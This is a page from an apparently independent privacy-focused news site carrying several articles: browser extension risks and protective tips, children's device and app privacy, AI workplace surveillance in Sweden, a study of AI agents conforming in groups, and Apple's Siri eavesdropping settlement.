Saturday, June 7, 2025

Polaris of Enlightenment

The most dangerous thing in your browser

The dark side of browser extensions.

Published 26 April 2025
– By Naomi Brockwell
6 minute read
You’re browsing the web, trying to make life a little easier. Maybe you install an extension to block annoying popups, write better emails, or even just save a few bucks with coupon codes.

Seems harmless, right?

Extensions are way more permissive and dangerous than people realize.

They might be spying on you, logging your browsing history, injecting malicious code, even stealing your passwords and cookies – all without you even realizing it.

Let’s talk about the dark side of browser extensions. Because once you see what they’re capable of, you might think twice before installing another one.

Real-world attacks: From spyware to crypto theft

This isn’t a “worst-case scenario”. It’s already happening.

  • North Korean hackers have used malicious browser extensions to spy on inboxes and exfiltrate sensitive emails.
  • The DataSpii scandal exposed the private data of over 4 million users—collected and sold by innocent-looking productivity tools.
  • Mega.nz, a privacy-respecting file storage service, had its Chrome extension hacked. Malicious code was pushed to users, silently stealing passwords and crypto wallet keys. It took them four hours to catch it—more than enough time for real damage.
  • Cyberhaven, a cybersecurity company, was breached in late 2024. Their extension was hijacked and used to scrape cookies, session tokens, and authentication credentials—compromising over 400,000 users.

How is this even allowed to happen?

  1. Extensions can silently update themselves. The code running on your device can change at any time—without your knowledge or approval.
  2. Permissions are ridiculously broad. Even if a malicious extension has the same permissions as a good one, it can abuse them in ways the browser can’t distinguish. Once you grant access, it’s basically an honor system.
  3. Extensions can’t monitor each other. If you think that installing a malware-blocking extension is going to protect you, think again. Your defense extensions have no way of knowing what your other extensions are up to. Malicious ones can lurk undetected, even alongside security tools.

A Shadow market for extensions

Extensions aren’t just targets for hackers—they’re targets for buyers. Once an extension gets popular, developers often start getting flooded with offers to sell. And because extensions can silently update, a change in ownership can mean a complete change in behavior—without you ever knowing.

Got an extension with 2 million Facebook users? Buy it, slip in some malicious code, and suddenly you’re siphoning data from 2 million people.

There are entire marketplaces for buying and selling browser extensions—and a thriving underground market too.

Take The Great Suspender, for example. It started as a widely trusted tool that saved memory by suspending unused tabs. Then the developer quietly sold it. The new owner injected spyware, turning it into a surveillance tool. Millions of users were compromised before it was finally flagged and removed.

The danger is in the permissions

One of the biggest challenges? Malicious extensions often ask for the same permissions as good ones. So it’s helpful to understand exactly what each permission is capable of, so that you realize how vulnerable it could make you in the wrong hands.

We spoke to Matt Frisbie, author of Building Browser Extensions, to explain the capabilities of some of these permissions:

Browsing history

Matt Frisbie:

The browser will happily dump out your history as an array.

The browsing history permission grants full access to every site you visit—URLs, timestamps, and frequency. This can help build out a detailed profile on you.

Cookies

The cookie permission exposes your browser’s cookies—including authentication tokens. That means a malicious extension can impersonate you and access your accounts without needing a password or 2FA.

Matt Frisbie:

“If someone steals your cookies, they can pretend to be you in all sorts of nasty ways.”

This is exactly how Linus Tech Tips had their YouTube account hijacked.

Screen capture

Allows extensions to take screenshots of what you’re viewing. Some types trigger a popup, but tab capture does not—it silently records the visible browser tab, even sensitive pages like banking or crypto dashboards.

Matt Frisbie:

“It just takes a screengrab and sends it off, and you will never know what’s happening.”

Web requests

This lets the extension monitor all your browser’s traffic, including data sent to and from websites. Even if the data is being sent over HTTPS, to the extension it’s all in the clear. They can read form data, credit card details, everything.

Matt Frisbie:

“It’s basically a man-in-the-middle… I can see what you’re sending to stripe.com—even if their security is immaculate.”

Web navigation

Provides a live feed of your browsing behavior—what pages you visit, how you get there, and when.

Keystroke logging

Records everything you type—searches, passwords, messages—without needing any special permissions. All it takes is a content script, which runs invisibly on websites.

Matt Frisbie:

“It’s incredibly dangerous and very easy to do.”

Input capture

Watches for changes in form fields, allowing extensions to steal autofilled passwords or credit card numbers—even if you don’t type anything.

Matt Frisbie:

“Anytime an input changes—login box, search bar, credit card entry—this extension can capture what’s changed.”

Geolocation

Extensions can’t access your location in the background. But they can render a user interface—like a popup window—and collect your location when you interact with it. If you’ve granted the extension geolocation permission, it can capture your location every time you open that popup.

Even sneakier? Extensions can piggyback off websites that already have location access. If you’ve allowed a site like maps.google.com or hulu.com to use your location, an extension running on that site can silently grab it—no popup required.

Matt Frisbie:

“If the user goes to maps.google.com and they’ve previously said maps.google.com can read my location… then the extension can piggyback on that and grab their location. No pop-ups generated.”

Other Piggybacking

If you’ve granted a site permission—like location, notifications, or potentially even camera and microphone—an extension running on that same site can sometimes piggyback off that access and silently collect the same data.

Matt Frisbie:

“It is actually possible to piggyback off the page’s permissions. … It really shouldn’t work that way.”

So… How Do You Protect Yourself?

Here are some smart rules to follow:

  • Understand permissions
    Know what you’re granting access to, and what that permission might be capable of.
  • Be careful granting any permissions
    Whether it’s a browser setting, a site request, or an extension prompt, even a single permission can open the door to surveillance.
  • Use extensions sparingly
    The more extensions you install, the larger your attack surface—and the more unique your browser fingerprint becomes.
  • Use a privacy-first browser instead
    Browsers like Brave build privacy protections—like ad and tracker blocking—directly into the browser itself, so you don’t need extensions just to stay private.
  • Follow the principle of least privilege
    Only allow an extension to run when you click it, instead of “on all websites.”
  • Use code review tools
    Sites like Extension Total and Secure Annex can help you vet extensions before you install them.

Takeaway

We all want our browser to be faster, cleaner, and more functional. Extensions can help—but they can also turn into powerful surveillance tools. Even a single line of malicious code, slipped in through an update or new owner, can put your most sensitive information at risk.

So before you install that next extension, ask yourself:
Do I really trust this extension not to be hacked, sold, or misused—and is the extra risk worth it?

Stay sharp. Stay private. Stay safe out there.

 

Yours in privacy,
Naomi

Naomi Brockwell is a privacy advocacy and professional speaker, MC, interviewer, producer, podcaster, specialising in blockchain, cryptocurrency and economics. She runs the NBTV channel on Youtube.

TNT is truly independent!

We don’t have a billionaire owner, and our unique reader-funded model keeps us free from political or corporate influence. This means we can fearlessly report the facts and shine a light on the misdeeds of those in power.

Consider a donation to keep our independent journalism running…

Opt-in childhood

What we signed them up for before they could object.

Published today 7:48
– By Naomi Brockwell
6 minute read

A few weeks ago, we published an article about oversharing on social media, and how posting photos, milestones, and personal details can quietly build a digital footprint for your child that follows them for life.

But social media isn’t the only culprit.

Today, I want to talk about the devices we give our kids: the toys that talk, the tablets that teach, the monitors that watch while they sleep.

These aren’t just tools of convenience or connection. Often, they’re Trojan horses, collecting and transmitting data in ways most parents never realize.

We think we’re protecting our kids.
But in many cases, we’re signing them up for surveillance systems they can’t understand, and wouldn’t consent to if they could.

How much do you know about the toys your child is playing with?

What data are they collecting?
With whom are they sharing it?
How safely are they storing it to protect against hackers?

Take VTech, for example — a hugely popular toy company, marketed as safe, educational, and kid-friendly.

In 2015, VTech was hacked. The breach wasn’t small:

  • 6.3 million children’s profiles were exposed, along with nearly 5 million parent accounts
  • The stolen data included birthdays, home addresses, chat logs, voice recordings… even photos children had taken on their tablets

Terms no child can understand—but every parent accepts

It’s not just hackers we should be mindful of — often, these companies are allowed to do almost anything they want with the data they collect, including selling it to third parties.

When you hand your child a toy that connects to Wi-Fi or Bluetooth, you might be agreeing to terms that say:

  • Their speech can be used for targeted advertising
  • Their conversations may be retained indefinitely
  • The company can change the terms at any time, without notice

And most parents will never know.

“Safe” Devices With Open Doors

What about things like baby monitors and nanny cams?

Years ago, we did a deep dive into home cameras, and almost all popular models were built without end-to-end encryption. That means the companies that make them can access your video feed.
How much do you know about that company?
How well do you trust every employee who might be able to access that feed?

But it’s not just insiders you should worry about.
Many of these kiddy cams are notoriously easy to hack. The internet is full of real-world examples of strangers breaking into monitors, watching, and even speaking to infants.

There are even publicly available tools that scan the internet and map thousands of unsecured camera feeds, sortable by country, type, and brand.
If your monitor isn’t properly secured, it’s not just vulnerable — it’s visible.

Mozilla, through its Privacy Not Included campaign, audited dozens of smart home devices and baby monitors. They assessed whether products had basic security features like encryption, secure logins, and clear data-use policies. The verdict? Even many top-selling monitors had zero safeguards in place.

These are the products we’re told are protecting our kids.

Apps that glitch, and let you track other people’s kids

A T-Mobile child-tracking app recently glitched.
A mother refreshed the screen—expecting to see her kids’ location.
Instead, she saw a stranger’s child. Then another. Then another.

Each refresh revealed a new kid in real time.

The app was broken, but the consequences weren’t abstract.
That’s dozens of children’s locations broadcast to the wrong person.
The feature that was supposed to provide control did the opposite.

Schools are part of the problem, too

Your child’s school likely collects and stores sensitive data—without strong protections or meaningful consent.

  • In Virginia, thousands of student records were accidentally made public
  • In Seattle, a mental health survey led to deeply personal data being stored in unsecured systems

And it’s not just accidents.

A 2015 study investigated “K–12 data broker” marketplaces that trade in everything from ethnicity and affluence to personality traits and reproductive health status.
Some companies offer data on children as young as two.
Others admit they’ve sold lists of 14- and 15-year-old girls for “family planning services.”

Surveillance disguised as protection

Let’s be clear: the internet is a minefield, filled with ways children can be tracked, profiled, or preyed upon. Protecting them is more important than ever.

One category of tools that’s exploded in popularity is the parental control app—software that lets you see everything happening on your child’s device:
The messages they send. The photos they take. The websites they visit.

The intention might be good. But the execution is often disastrous.

Most of these apps are not end-to-end encrypted, meaning:

  • Faceless companies gain full access to your child’s messages, photos, and GPS
  • They operate in stealth mode, functionally indistinguishable from spyware
  • And they rarely protect that data with strong security

Again, how much do you know about these companies?
And even if you trust them, how well are they protecting this data from everyone else?

The “KidSecurity” app left 300 million records exposed, including real-time child locations and fragments of parent credit cards.
The “mSpy” app leaked private messages and movement histories in multiple breaches.

When you install one of these apps, you’re not just gaining access to your child’s world.
So is the company that built it… and everyone they fail to protect it from.

What these breaches really teach us

Here’s the takeaway from all these hacks and security failures:

Tech fails.

We don’t expect it to be perfect.
But when the stakes are this high — when we’re talking about the private lives of our children — we should be mindful of a few things:

1) Maybe companies shouldn’t be collecting so much information if they can’t properly protect it.
2) Maybe we shouldn’t be so quick to hand that information over in the first place.

When the data involves our kids, the margin for error disappears.

Your old phone might still be spying

Finally, let’s talk about hand-me-downs.

When kids get their first phone, it’s often filled with tracking, sharing, and background data collection from years of use. What you’re really passing on may be a lifetime of surveillance baked into the settings.

  • App permissions often remain intact
  • Advertising IDs stay tied to previous behavior
  • Pre-installed tracking software may still be active

The moment it connects to Wi-Fi, that “starter phone” might begin broadcasting location data and device identifiers — linked to both your past and your child’s present.

Don’t opt them in by default: 8 ways to push back

So how do we protect children in the digital age?

You don’t need to abandon technology. But you do need to understand what it’s doing, and make conscious choices about how much of your child’s life you expose.

Here are 8 tips:

1: Stop oversharing
Data brokers don’t wait for your kid to grow up. They’re already building the file.
Reconsider publicly posting their photos, location, and milestones. You’re building a permanent, searchable, biometric record of your child—without their consent.
If you want to share with friends or family, do it privately through tools like Signal stories or Ente photo sharing.

2: Avoid spyware
Sometimes the best way to protect your child is to foster a relationship of trust, and educate them about the dangers.
If monitoring is essential, use self-hosted tools. Don’t give third parties backend access to your child’s life.

3: Teach consent
Make digital consent a part of your parenting. Help your child understand their identity—and that it belongs to them.

4: Use aliases and VoIP numbers
Don’t link their real identity across platforms. Compartmentalization is protection.

5: Audit tech
Reset hand-me-down devices. Remove unnecessary apps. Disable default permissions.

6: Limit permissions
If an app asks for mic or camera access and doesn’t need it—deny it. Always audit.

7: Set boundaries with family
Ask relatives not to post about your child. You’re not overreacting—you’re defending someone who can’t yet opt in or out.

8: Ask hard questions
Ask your school how data is collected, stored, and shared. Push back on invasive platforms. Speak up when things don’t feel right.

Let Them Write Their Own Story

We’re not saying throw out your devices.
We’re saying understand what they really do.

This isn’t about fear. It’s about safety. It’s about giving your child the freedom to grow up and explore ideas without every version of themselves being permanently archived, and without being boxed in by a digital record they never chose to create.

Our job is to protect that freedom.
To give them the chance to write their own story.

Privacy is protection.
It’s autonomy.
It’s dignity.

And in a world where data compounds, links, and lives forever, every choice you make today shapes the freedom your child has tomorrow.

 

Yours in privacy,
Naomi

Naomi Brockwell is a privacy advocacy and professional speaker, MC, interviewer, producer, podcaster, specialising in blockchain, cryptocurrency and economics. She runs the NBTV channel on Youtube.

AI surveillance in Swedish workplaces sparks outrage

Mass surveillance

Published 4 June 2025
– By Editorial Staff
In practice, it is possible to analyze not only employees' productivity - but also their facial expressions, voices and emotions.
2 minute read

The rapid development of artificial intelligence has not only brought advantages – it has also created new opportunities for mass surveillance, both in society at large and in the workplace.

Even today, unscrupulous employers use AI to monitor and map every second of their employees’ working day in real time – a development that former Social Democratic politician Kari Parman warns against and calls for decisive action to combat.

In an opinion piece in the Stampen-owned newspaper GP, he argues that AI-based surveillance of employees poses a threat to staff privacy and calls on the trade union movement to take action against this development.

Parman paints a bleak picture of how AI is used to monitor employees in Swedish workplaces, where technology analyzes everything from voices and facial expressions to productivity and movement patterns – often without the employees’ knowledge or consent.

It’s a totalitarian control system – in capitalist packaging”, he writes, continuing:

There is something deeply disturbing about the idea that algorithms will analyze our voices, our facial expressions, our productivity – second by second – while we work”.

“It’s about power and control”

According to Parman, there is a significant risk that people in digital capitalism will be reduced to mere data points, giving employers disproportionate power over their employees.

He sees AI surveillance as more than just a technical issue and warns that this development undermines the Swedish model, which is based on balance and respect between employers and employees.

It’s about power. About control. About squeezing every last ounce of ‘efficiency’ out of people as if we were batteries”.

If trade unions fail to act, Parman believes, they risk becoming irrelevant in a working life where algorithms are taking over more and more of the decision-making.

To stop this trend, he lists several concrete demands. He wants to see a ban on AI-based individual surveillance in the workplace and urges unions to introduce conditions in collective agreements to review and approve new technology.

Kari Parman previously represented the Social Democrats in Gnosjö. Photo: Kari Parman/FB

“Reduced to an algorithm’s margin of error”

He also calls for training for safety representatives and members, as well as political regulations from the state.

No algorithm should have the right to analyze our performance, movements, or feelings”, he declares.

Parman emphasizes that AI surveillance not only threatens privacy but also creates a “psychological iron cage” where employees constantly feel watched, blurring the line between work and private life.

At the end of the article, the Social Democrat calls on the trade union movement to take responsibility and lead the resistance against the misuse of AI in the workplace.

He sees it as a crucial issue for the future of working life and human dignity at work.

If we don’t stand up now, we will be alone when it is our turn to be reduced to an algorithm’s margin of error”, he concludes.

AI agents succumb to peer pressure

Published 2 June 2025
– By Editorial Staff
Even marginal variations in training data can cause significant differences in how language models behave in group interactions.
3 minute read

A new study shows that social AI agents, despite being programmed to act independently, quickly begin to mimic each other and succumb to peer pressure.

Instead of making their own decisions, they begin to uncritically adapt their responses to the herd even without any common control or plan.

– Even if they are programmed for something completely different, they can start coordinating their behavior just by reacting to each other, says Andrea Baronchelli, professor of complex systems at St George’s University of London.

An AI agent is a system that can perform tasks autonomously, often using a language model such as ChatGPT. In the study, the researchers investigated how such agents behave in groups.

And the results are surprising: even without an overall plan or insight, the agents began to influence each other – and in the end, almost the entire group gave the same answer.

– It’s easy to test a language model and think: this works. But when you release it together with others, new behaviors emerge, Baronchelli explains.

“A small minority could tip the whole system”

The researchers also studied what happens when a minority of agents stick to a deviant answer. Slowly but surely, the other agents began to change their minds. When enough had changed their minds – a point known as critical mass – the new answer spread like a wave through the entire group. The phenomenon is similar to how social movements or revolutions can arise in human societies.

It was unexpected that such a small minority could tip the whole system. This is not a planned collaboration but a pattern that emerges spontaneously, the researcher told Swedish public television SVT.

AI agents are already used today on social media, for example in comment fields, automatic responses, or texts that mimic human language. But when one agent is influenced by another, which in turn has been influenced by a third, a chain reaction occurs. This can lead to false information spreading quickly and on a large scale.

– We often trust repetition. But in these systems, we don’t know who said what first. It becomes like an echo between models, says Anders Sandberg, a computer scientist at the Institute for Future Studies.

Lack of transparency

Small differences in how a language model is trained can lead to large variations in behavior when the models interact in a group. Predicting and preventing unwanted effects requires an overview of all possible scenarios something that is virtually impossible in practice. At the same time, it is difficult to hold anyone accountable: AI agents spread extremely quickly, their origins are often difficult to trace, and there is limited insight into how they are developed.

It is the companies themselves that decide what they want to show. When the technology is closed and commercial, it becomes impossible to understand the effects – and even more difficult to defend against them, Sandberg notes.

The study also emphasizes the importance of understanding how AI agents behave as a collective something that is often overlooked in technical and ethical discussions about AI.

– The collective aspect is often missing in today’s AI thinking. It’s time to take it seriously, urges Andrea Baronchelli.

Apple sued over iPhone eavesdropping – users may get payouts

Published 1 June 2025
– By Editorial Staff
Apple has denied any wrongdoing - but finally agreed to pay $95 million in a settlement.
3 minute read

Apple’s voice assistant Siri was activated without commands and recorded sensitive conversations – recordings that were also allegedly shared with other companies.

Now users in the US can get compensation – even if it’s relatively small amounts.

Technology giant Apple was caught in the crossfire after it was discovered that its voice assistant, Siri, recorded private conversations without users’ knowledge. The company has agreed to pay $95 million in a settlement reached in December last year, following a class action lawsuit alleging privacy violations.

The lawsuit was filed in 2021 by California resident Fumiko Lopez along with other Apple users. They stated that Siri-enabled devices recorded conversations without users first intentionally activating the voice assistant by saying “Hello, Siri” or pressing the side button.

According to the allegations, the recordings were not only used to improve Siri, but were also shared with third-party contractors and other actors – without users’ consent. It is also alleged that the information was used for targeted advertising, in violation of both US privacy laws and Apple’s own privacy policy.

However, Apple has consistently denied the allegations and claims that its actions were neither “wrong nor illegal”. However, paying such a large sum to avoid further litigation has raised questions about what may have been hidden from the public.

Users can claim compensation

Individuals who owned a Siri-enabled Apple product – such as an iPhone, iPad, Apple Watch, MacBook, iMac, HomePod, iPod touch or Apple TV – between September 17, 2014 and December 31, 2024, and who live in the United States or a U.S. territory, may now be entitled to compensation.

However, to qualify, one must certify that Siri was inadvertently activated during a call that was intended to be private or confidential.

The reimbursement applies to up to five devices, with a cap of $20 per device – totaling up to $100 per person. The exact amount per user will be determined once all claims have been processed.

Applications must be submitted by July 2, 2025, and those eligible may have already received an email or physical letter with an identification code and confirmation code. Those who haven’t received anything but still think they qualify can instead apply for reimbursement via the settlement’s website – if you provide the model and serial number of your devices.

How to protect yourself from future interception

Users who want to strengthen their privacy can limit Siri’s access themselves in the settings:

  • Turn off Improve Siri: Go to Settings > Privacy & Security > Analytics & Improvements and disable Improve Siri & Dictation.
  • Delete Siri history: Go to Settings > Siri > Siri & Dictation History and select Delete Siri & Dictation History.
  • Turn off Siri completely: Go to Settings > Siri > Listen for “Hey Siri”, turn it off, then go to Settings > General > Keyboard and disable Enable Dictation.

Apple describes more privacy settings on its website, such as how to restrict Siri’s access to location data or third-party apps. But in the wake of the scandal, critics say that you shouldn’t blindly trust companies’ promises of data protection – and that the only way to truly protect your privacy is to take matters into your own hands.

Our independent journalism needs your support!
We appreciate all of your donations to keep us alive and running.

Our independent journalism needs your support!
Consider a donation.

You can donate any amount of your choosing, one-time payment or even monthly.
We appreciate all of your donations to keep us alive and running.

Dont miss another article!

Sign up for our newsletter today!

Take part of uncensored news – free from industry interests and political correctness from the Polaris of Enlightenment – every week.